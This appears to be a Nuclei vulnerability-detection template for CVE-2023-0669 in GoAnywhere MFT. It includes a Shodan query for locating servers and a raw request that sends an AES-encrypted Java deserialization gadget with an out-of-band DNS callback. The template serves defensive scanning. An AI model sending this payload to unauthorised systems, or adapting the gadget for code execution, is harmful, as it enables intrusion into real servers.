id: CVE-2023-0669

info:
  name: GoAnywhere MFT - Remote Code Execution (ZeroDay)
  author: rootxharsh,iamnoooob,dhiyaneshdk,pdresearch
  severity: high
  description: |
    Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.
  reference:
    - https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html
    - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1
    - https://infosec.exchange/@briankrebs/109795710941843934
    - https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2023-0669
    cwe-id: CWE-502
  metadata:
    shodan-query: http.favicon.hash:1484947000
    verified: "true"
  tags: cve,cve2023,rce,goanywhere,oast,kev

requests:
  - raw:
      - |
        POST /goanywhere/lic/accept HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded

        bundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")), base64_decode("Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo="), base64_decode("QUVTL0NCQy9QS0NTNVBhZA==")))), '$2')}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'GoAnywhere'

      - type: status
        status:
          - 500